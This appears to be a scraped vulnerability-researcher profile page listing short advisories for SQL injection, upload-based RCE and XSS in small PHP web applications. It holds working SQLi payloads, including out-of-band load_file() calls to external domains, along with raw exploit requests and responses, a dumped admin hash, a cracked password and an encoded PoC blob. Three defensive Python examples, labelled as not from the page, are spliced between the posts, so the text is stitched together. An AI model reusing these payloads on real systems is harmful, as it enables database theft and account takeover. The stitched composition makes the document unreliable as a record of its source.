nu11secur1ty (148)

Last Login: December 09, 2021
Assessments: 68
Score: 148
8th Place

nu11secur1ty's Latest (20) Contributions

1
Ratings
Technical Analysis

CVE-2021-41646

Vendor

Description:

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters.
The attacker can use the directory traversal method in the browser on the vulnerable directory to retrieve sensitive information or destroy the system by using an RCE method for this action!
Status: CRITICAL

Reproduce:

href

Proof and Exploit

href

1
Ratings
Technical Analysis

CVE-2021-42668

Vendor

Description

The id parameter from my_classmates.php in Engineers Online Portal 1.0 appears to be vulnerable to SQL injection and RCE attacks.
The payload '+(select load_file('\\n0o5m5xdxay49mw826umfj1wsnygm9ix90xrkh86.nu11secur1tyPenetrationTestingEngineer.net\sch'))+' was submitted in the id parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The attacker can bypass the admin account and he can upload malicious code by using the avatar function vulnerability with the directory traversal method,
then he can execute this malicious code. For this example, the attacker destroys all files in the current directory.
STATUS: Hyper Critical and Awful.
CONCLUSION: This pseudo developer must be stopped immediately.

MySQL Request:

GET /nia_munoz_monitoring_system/my_classmates.php?id=189' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=k6gnppcljj6b7vs8ua3tdefmkt
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/nia_munoz_monitoring_system/dashboard_student.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Fri, 03 Dec 2021 17:54:59 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 5946
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html class="no-js">
<head>
<title>NIA Project Monitoring System</title>
       <meta name="description" content="Learning Management System">
       <meta name="keywords" conte
...[SNIP]...
<ul     id="da-thumbs" class="da-thumbs">
                                        You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''189'' order by lastname' at line 4

Reproduce:

href

Proof and Exploit:

href

M0r3:

Proof and Exploit:

href

1
Ratings
Technical Analysis

CVE-2021-37808

Vendor

Description:

The searchtitle parameter from News Portal Project 3.1 appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\wddcdzjvtmxtfkwxdw5gwdmxpovhj99x00osbiz7.nu11secur1tycollaborator.net\lni'))+' was submitted in the searchtitle parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can retrieve sensitive information
for all accounts of this system, and he can manipulate them!
STATUS: Critical and awful.

Reproduce:

href

Proof and Exploit:

href

1
Ratings
Technical Analysis

CVE-2021-41492

Software

Description:

The username parameter from Sourcecodester Simple Cashiering System (POS) 1.0 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the username parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. The attacker can retrieve sensitive information from the database for all users, and also the administrator account!

MySQL Request:

POST /cashiering/Actions.php?a=login HTTP/1.1
Host: 192.168.10.63
Origin: http://192.168.10.63
Cookie: PHPSESSID=bgtkft2eqoj6s4ajhp414erka3
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://192.168.10.63/cashiering/login.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 37

username=tralala'&password=@32e23eq3r

MySQL Response:

HTTP/1.1 200 OK
Date: Wed, 01 Dec 2021 12:06:18 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 521
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Warning</b>: SQLite3::query(): Unable to prepare statement: 1, unrecognized token: &quot;5a72f9fa6edacd9d71b9e2dc9d1a9ecc&quot; in <b>C:\xampp\htdocs\cashiering\Actions.php</b> on line <b>1
...[SNIP]...
<b>Fatal error</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\cashiering\Actions.php:15
Stack trace:
#0 C:\xampp\htdocs\cashiering\Actions.php(233): Actions-&gt;login()
#1 {main}
thrown in <b>

Reproduce:

href

Proof and exploit:

href

BR nu11secur1ty

1
Ratings
Technical Analysis

CTMS

Vendor

Description:

The parameters username and contactno from COVID 19 Testing Management System (CTMS) 1.0 are vulnerable to Remote Code SQL injection attacks.
Test REQUESTS: Payloads 27325265' or 8079=8079-- and 35638130' or 9157=9162--.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
The attacker can execute a Remote Code Injection to override the current password for the admin account directly from the broadcast networks!
Status Critical and awful.
BR nu11secur1ty

Reproduce:

href

Proof:

href
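The two probes described in the Cashiering System post above (a single quote breaks the statement, two quotes do not) and the paired true/false payloads in the CTMS post are both symptoms of one defect: user input spliced into SQL text. The following added example, which is not code from the page or from the projects it discusses, reproduces that defect against a constructed in-memory SQLite table and shows the parameterized form that removes it. The table, the sample credential and the MD5 hashing are assumptions made only so that the vulnerable query has the same shape as the one behind the page's error output (a hash-like token left dangling after the quote); MD5 is not being recommended for password storage.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed stand-in for the application's SQLite user table (sample data, not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        ("admin", hashlib.md5(b"s3cret-sample").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The defect: the username is pasted into the SQL text.

    A lone quote leaves the hash as a dangling token (the 'unrecognized token'
    error on the page); a tautology such as x' or 8079=8079-- comments out the
    password check entirely.
    """
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = (
        "SELECT id, username FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, pw_hash)
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """The fix: bound parameters. Input never becomes SQL syntax, so quotes and
    comment markers are just characters compared against the column."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, pw_hash)).fetchone()


def probe(login, conn, username, password):
    """Classify an attempt the way the page's write-ups do:
    'error' (statement broken), 'row' (a user came back) or 'none'."""
    try:
        return "row" if login(conn, username, password) else "none"
    except sqlite3.OperationalError:
        return "error"


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", login_vulnerable), ("safe", login_safe)):
        for user in ("tralala'", "tralala''", "27325265' or 8079=8079--", "27325265' or 9157=9162--"):
            print(f"{name:10s} {user!r:32s} -> {probe(fn, db, user, 'x')}")
```

The differential the page relies on (error vs. no error, true-tautology row vs. false-tautology none) only appears on the vulnerable path; the parameterized path answers "none" to every probe and "row" only for the real credential, which is the property a fix should be tested against.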

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41648

Vendor

Software

Description:

The p parameter of the PuneethReddyHC online-shopping-system-advanced 1.0 appears to be vulnerable to SQL injection attacks.
The payload (select load_file ('\\\\grb7dmacp8fse7awai6uedfhi8o2cz0q2et1jp8.nu11secur1tycollaborator.net\\mpv')) was submitted in the p parameter.
This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.
The malicious user can attack the database using four SQL injection methods (UNION query, time-based blind, error-based and boolean-based blind),
then he can dump all information from this database of the app, then he can log in to the admin account, and can do malicious stuff.
Conclusion: Status Critical.

Reproduce:

href

Proof and Exploit:

href

Action:

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41675

Vendor

Author and redevelopment of the PoC

  • nu11secur1ty

First cool ;) Idea:

  • Thank you, dear friend!
  • Janik Wehrli

Description:

A Remote Code Execution (RCE) vulnerability exists in Sourcecodester E-Negosyo System 1.0 in /admin/produts/controller.php via the do Insert function, which validates images with getImageSizei… More about the function: https://www.php.net/manual/en/function.getimagesize.php The attacker can deploy malicious RCE files bypassing this function, and after that, he can use the directory traversal method, to navigate to the /uploaded_photos/ directory which is another and actual problem of this system. After the problem, which is – no sanitizing of the function “(getimagesize())” on this system, the attacker can execute the malicious RCE code, and then he can retrieve all sensitive information about the App on this server, and all architecture of this server. CONCLUSION: There is no proper disinfection of “(getimagesize())” function, and correctly protecting the directory /uploaded_photos/.

Reproduce:

href

Proof and exploit:

href
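The post above attributes the upload bypass to a filter that relies on getimagesize() alone, which only inspects the image header and says nothing about the file's name or what follows the header. As an added example (not code from the page or from the E-Negosyo project), here is the set of server-side checks such an upload handler should perform instead, written in Python with a constructed allowlist; the extension list, the magic-byte table and the marker scan are assumptions chosen for illustration. The marker scan is a heuristic; the controls that actually stop execution are the extension allowlist, the server-chosen file name and serving the upload directory without script execution.

```python
import os
import secrets
from pathlib import PurePosixPath

# Constructed allowlist: the only extensions accepted and the magic bytes each must start with.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Suffixes that must not appear anywhere in the name (shell.php.jpg is rejected too).
EXECUTABLE_SUFFIXES = {"php", "phtml", "php3", "php4", "php5", "phar", "htaccess"}

# Heuristic: an image that passed the header check but carries script markers is a polyglot.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")


def validate_upload(filename, data):
    """Return (ok, reason). Checks name, header and body; getimagesize() covers only the header."""
    base = os.path.basename(filename)  # drop any client-supplied path components
    suffixes = [s.lstrip(".").lower() for s in PurePosixPath(base).suffixes]
    if not suffixes:
        return False, "no extension"
    if any(s in EXECUTABLE_SUFFIXES for s in suffixes):
        return False, "executable extension present"
    ext = suffixes[-1]
    if ext not in ALLOWED:
        return False, "extension not allowed"
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        return False, "content does not match extension"
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        return False, "script marker inside image data"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random token plus the validated extension, never the client's name."""
    ext = PurePosixPath(os.path.basename(filename)).suffix.lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    gif = b"GIF89a" + b"\x00" * 20  # constructed minimal GIF header
    for name, blob in (("avatar.gif", gif), ("avatar.php", b"<?php echo 1;"),
                       ("avatar.php.jpg", b"\xff\xd8\xff" + gif), ("../../avatar.gif", gif)):
        ok, why = validate_upload(name, blob)
        print(f"{name:20s} -> {ok} ({why})", "stored as", storage_name(name) if ok else "-")
```

Store the result outside the document root (or in a directory where the web server has script execution disabled) under the name from storage_name(); that removes the second problem the post names, traversal into /uploaded_photos/, because the client never controls where the file lands or what it is called.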

1
Ratings
Technical Analysis

CVE-2021-42671

Vendor

Description:

An RCE vulnerability exists in Engineers Online Portal 1.0 when the malicious user creates an account with a malicious purpose.
Once the user has the account, he can upload a malicious RCE exploit without any problem – no sanitizing.
After uploading this RCE malicious file, he can navigate by using the directory traversal method, which is another problem of this system, then he can execute the malicious code. Conclusion: Status awful and critical.

Reproduce:

href

Proof and exploit:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43141

Vendor

Description:

Cross-Site Scripting (XSS) vulnerability exists in Sourcecodester Simple Subscription Website 1.0 via the id parameter in plan_application and users_application.
The attacker can use SQL – Injection bypass Authentication method to log in to the admin account of the system and then he can exploit this account by using XSS-Stored to attack and exploit the account, and then he can use remote requests to hijack PHPSESSID and can exploit this account and users into it by using an XSS-Stored method!
Conclusion: The status of this system is CRITICAL and awful, and this must be stopped immediately for distribution!

Action:

Reproduce:

href

Proof and exploit:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-nu11-20-100121

CVE-2021-41931

Description of vulnerability:

The Company’s Recruitment Management System (by: oretnom23) in id=2 of the parameter from view_vacancy app on-page appears to be vulnerable to SQL Injection – Stealing the Password Hashes attacks.
The payloads 19424269' or '1309'='1309 and 39476597' or '2917'='2923 were each submitted in the id parameter.
These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Description of the exploit:

Exploit Title: Recruitment Management System is vulnerable to MySQL injection - Stealing the Password Hashes attacks.
Date: 2021-10-01
Exploit Author: nu11secur1ty
Vendor Homepage: https://www.sourcecodester.com/user/257130/activity
Software Link: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
Version: (by: oretnom23) dev
  • MySQL Request:
GET /employment_application/?page=view_vacancy&id=219424269'%20or%20'1309'%3d'1309 HTTP/1.1
Host: 192.168.1.180
Cookie: PHPSESSID=oku6deve0oo3qbrbbprp5jnb6j
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/employment_application/?page=vacancy
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
  • MySQL Response
HTTP/1.1 200 OK
Date: Fri, 01 Oct 2021 09:37:56 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12044

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
<h5 class="card-title fw-bold wow">Sample Vacancy 101</h5>
...[SNIP]...
<div class="fs-5 ps-4">IT Depatment</div>
...[SNIP]...
<div class="fs-5 ps-4">Jr. Web Developer</div>
...[SNIP]...
<span class="badge bg-success rounded-pill">3</span>
...[SNIP]...
<div class="fs-6 ps-4"><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin pretium vel tortor id semper. Donec ultrices sagittis euismod. Pellentesque ultrices lectus in suscipit ultricies. Morbi eget erat enim. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Mauris nec ex non lectus interdum interdum sit amet in lacus. Maecenas eu nulla nec nisi bibendum euismod in a nibh. Nullam quis gravida turpis. Donec hendrerit sagittis arcu quis mollis. Quisque pretium est in turpis pulvinar, nec pellentesque sem sagittis. Quisque ultrices molestie risus id varius. Vivamus sed efficitur erat, quis cursus massa. In in varius purus. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia curae; Quisque eget cursus nunc. Aenean semper neque velit, quis ullamcorper justo efficitur id.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;"><b>Qualification:</b></p><ul><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 1</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 2</li><li style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-size: 14px;">Qualification 3<br></li></ul><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; font-family: &quot;Open Sans&quot;, Arial, 
sans-serif; font-size: 14px;">In ut ligula et erat ullamcorper imperdiet. Pellentesque vitae justo facilisis, gravida sapien quis, mollis urna. Proin eu aliquam justo. Cras malesuada, nunc ac varius dapibus, orci ante pretium elit, non porta augue lectus sit amet orci. Ut ac porta mauris. Donec venenatis nisi sit amet massa sollicitudin lobortis. Quisque eros lectus, blandit et dapibus eu, gravida a risus. Vivamus sodales rutrum purus ac dictum. Integer massa velit, facilisis at leo vitae, semper congue mi. Vivamus bibendum sem eget porta tristique. Nunc nisl odio, pellentesque nec pellentesque quis, consequat ut neque. Sed elementum vel augue malesuada ultrices. Nullam dapibus mattis leo vitae laoreet.</p></div>
...[SNIP]...
  • PoC r0n1n.bat
XvL5vVDYAJj4HVMbIvtHb6RMoVRD9iM5nNOr2XqhOpGam2eUj8ytNzzaJyLI+Pv0MtFALO1RllnynHT6Odr38k3iyKIyTN+FszTfPrdRuHJlBKLn79q7ClWCQwWKYtTOXSPGgaKHIyxQz6RR+8JV9FQMmUjHtus7ENGSGsbL8RJIHfCVRqH6xb8tpXPJILc4gIn7mseYxiLp8x7s5Q4QhGXnHvhrsj7lE6jqTQmphumt3gQmBvxlhQILxBKGSG5ZxoVleq4xR/aUiivIiejShajuYChPXHzDF3g/e41aX4BpHa3iQsf390FP+m+FKrpeNPSZUcQAy48EwgEdHNz04yblTBo5sS5ywV5ej+3ZmiwVALH6MSvnLG3mTqglNXSc4+/MkxxmuPrn0Xbe5EZnuGjZTAnWFqfzQJjwy3A8gI2AQWH+RAR2CdWCRzr6hB0rFYJlPrFOKWAgpPB92HfUsQ==

Decrypt of the password

The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123

Reproduce:

href

Proof:

href

  • Music: – UKF

BR @nu11secur1ty

1
Ratings
Technical Analysis

CVE-2021-42665

Vendor

Description:

An SQL Injection vulnerability exists in Sourcecodester Engineers Online Portal in PHP via the login form inside of index.php, which can allow an attacker to bypass authentication.
And five more SQL – Injections, the attacker can bypass all accounts of this system and he can manipulate those accounts with
malicious purposes and destroy the owners of these accounts. This system also has six more XSS: 4 reflected and 2 (CSRF) vulnerabilities!
Status: Critical and extremely awful!
Conclusion: This system must be stopped from distribution immediately! BR nu11secur1ty

Types of SQL Injections:

---
Parameter: firstname (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: firstname=tbcRxVrk' OR NOT 6030=6030#&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: firstname=tbcRxVrk' AND (SELECT 4603 FROM(SELECT COUNT(*),CONCAT(0x716b717671,(SELECT (ELT(4603=4603,1))),0x717a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- upfj&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: firstname=tbcRxVrk' AND (SELECT 2357 FROM (SELECT(SLEEP(5)))mNaQ)-- xKTb&lastname=tbcRxVrk&department_id='&username=tbcRxVrk&password=x6P!w4r!A0&cpassword=x6P!w4r!A0
---

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-42667

Vendor

Payloads:

Description:

The ID parameter from Online Event Booking and Reservation System 2.3.0 appears to be vulnerable to SQL injection attacks. There are 4 types of SQL injection.
The malicious user can bypass the database and he can dump all database information then he can access all accounts which this system has! The attacker can take sensitive information and can exploit the users of this system. Conclusion: awful status…
BR nu11secur1ty

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-42580

Vendor

Description:

Sourcecodester Online Learning System 2.0 is vulnerable to SQL injection authentication bypass in the admin login file (/admin/login.php).
After exploiting the admin account by using SQL-malicious payload the attacker can take a PHPSESSID by using XSS-Stored attack and can take control again and again and again. So awful…

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43130

Vendor

Description:

An SQL Injection vulnerability exists in Sourcecodester Customer Relationship Management System (CRM) 1.0 via the username parameter in customer/login.php.
The username parameter is not sanitized against malicious POST requests; the malicious user can use a malicious payload to bypass the admin login.

Reproduce:

href

Proof:

href

2
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-43140

Vendor

Description:

The id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application’s handling of other input, to confirm whether a vulnerability is present.

MySQL Request:

GET /plan_application/?page=apply&id=4' HTTP/1.1
Host: 192.168.1.2
Cookie: PHPSESSID=jtble9h28f0v3kh3op1ivmm9k4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.2/plan_application/?page=view_plan&id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Connection: close
Cache-Control: max-age=0

MySQL Response:

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2021 15:03:36 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3991
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1
...[SNIP]...
</b>: Uncaught Error: Call to a member function fetchArray() on bool in C:\xampp\htdocs\plan_application\apply.php:4
Stack trace:
#0 C:\xampp\htdocs\plan_application\index.php(98): include()
#1 {main}
thrown in <b>
...[SNIP]...

Reproduce:

href

Proof:

href

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-26822

Vendor Software

Description

The searchteacher parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\bqd'))+' was submitted in the searchteacher parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.

Payload

---
Parameter: searchteacher (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' AND (SELECT 5113 FROM (SELECT(SLEEP(5)))KIjD) AND 'VevZ'='VevZ&search=%C2%9E%C3%A9e

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707171,0x464270665473516670554b446c745478524849484b654b554b52594859554643445044594f587455,0x7170626b71),NULL,NULL,NULL-- -&search=%C2%9E%C3%A9e
---

After the exploit

Database: trms
Table: tbladmin
[1 entry]
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| ID | Email               | Password                         | UserName | AdminName | AdminRegdate        | MobileNumber |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| 1  | adminuser@gmail.com | f925916e2754e5e03f75dd58a5733251 | admin    | Admin     | 2019-10-04 09:10:04 | 8979555556   |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+

Reproduce:

href

Proof

href
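The requests in this post and the earlier load_file() posts share a few textual signatures once the query string is URL-decoded: a load_file() call with a UNC path, a UNION ... SELECT, a SLEEP(n), or a quote followed by a tautology. The following added example, not code from the page or from any project it discusses, scans constructed access-log lines for those signatures so that a defender can spot the probing the page describes; the log lines, the client address and the out-of-band host name are constructed samples, and the indicator list is an assumption rather than a complete rule set. Note that only GET targets appear in a standard access log; the POST bodies shown on the page (searchteacher, catename) would need request-body logging or a WAF to be seen.

```python
import re
from urllib.parse import unquote_plus

# Indicator name, severity and pattern, applied to the URL-decoded, lower-cased request target.
INDICATORS = [
    ("oob_unc_load_file", "high", re.compile(r"load_file\s*\(\s*'(\\){2,}")),
    ("union_select", "high", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("time_based_sleep", "high", re.compile(r"\bsleep\s*\(\s*\d+")),
    ("boolean_tautology", "medium", re.compile(r"'\s*or\s+'?\w+'?\s*=\s*'?\w+")),
    ("stray_quote", "low", re.compile(r"'")),  # noisy on its own (O'Brien), useful with others
]
SEVERITY = {name: sev for name, sev, _ in INDICATORS}
RANK = {"low": 1, "medium": 2, "high": 3}

# Combined/common log format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample log (addresses, paths and the .invalid host are made up for this example).
SAMPLE_LOG = [
    '192.168.1.5 - - [01/Oct/2021:09:37:56 +0000] "GET /employment_application/?page=view_vacancy&id=219424269%27%20or%20%271309%27%3d%271309 HTTP/1.1" 200 12044',
    '192.168.1.5 - - [03/Dec/2021:17:55:10 +0000] "GET /news/search.php?searchtitle=1%27%2B(select%20load_file(%27%5C%5Cattacker-oob.invalid%5Cabc%27))%2B%27 HTTP/1.1" 200 3120',
    '192.168.1.5 - - [03/Dec/2021:17:55:15 +0000] "GET /portal/my_classmates.php?id=189%27%20AND%20(SELECT%202357%20FROM%20(SELECT(SLEEP(5)))mNaQ)--%20x HTTP/1.1" 200 5946',
    '192.168.1.5 - - [03/Dec/2021:17:55:21 +0000] "GET /portal/my_classmates.php?id=189%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL--%20- HTTP/1.1" 200 7010',
    '192.168.1.7 - - [03/Dec/2021:17:56:02 +0000] "GET /plan_application/?page=view_plan&id=4 HTTP/1.1" 200 3991',
    '192.168.1.7 - - [03/Dec/2021:17:56:30 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 812',
]


def classify_target(target):
    """Decode the request target once, then return the names of every indicator that matches."""
    decoded = unquote_plus(target).lower()
    return [name for name, _sev, rx in INDICATORS if rx.search(decoded)]


def scan_log(lines):
    """Return one finding per flagged request: client, target, status, indicators, highest severity."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        hits = classify_target(m.group("target"))
        if not hits:
            continue
        worst = max((SEVERITY[h] for h in hits), key=RANK.__getitem__)
        findings.append({
            "ip": m.group("ip"),
            "target": m.group("target"),
            "status": int(m.group("status")),
            "indicators": hits,
            "severity": worst,
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['severity']:6s} {f['ip']:12s} {','.join(f['indicators']):40s} {f['target'][:70]}")
```

Treat "low" on its own as informational; the page's own probing pattern is a lone quote followed within seconds by a doubled quote or a tautology from the same client, so correlating stray_quote hits by source address and time window is what turns the weak indicator into a useful one.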

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-37806

Vendor

Software

On working

Description:

The catename parameter from Vehicle Parking Management System affected version 1.0 app appears to be vulnerable to SQL injection attacks – type time-based blind.
The payload '+(select load_file('\\ma0xscj8wyb2gd8sai9pcyvl7cd51xvlmoagx6lv.nu11secur1ty.net\hgt'))+' was submitted in the catename parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The application interacted with that domain, indicating that the injected SQL query was executed.

MySQL Request

POST /Vehicle%20parking%20management%20System%20project/vpms/add-category.php HTTP/1.1
Host: 192.168.1.2
Origin: http://192.168.1.2
Cookie: PHPSESSID=1earei5r7uisqidmakmk0es5ju
Upgrade-Insecure-Requests: 1
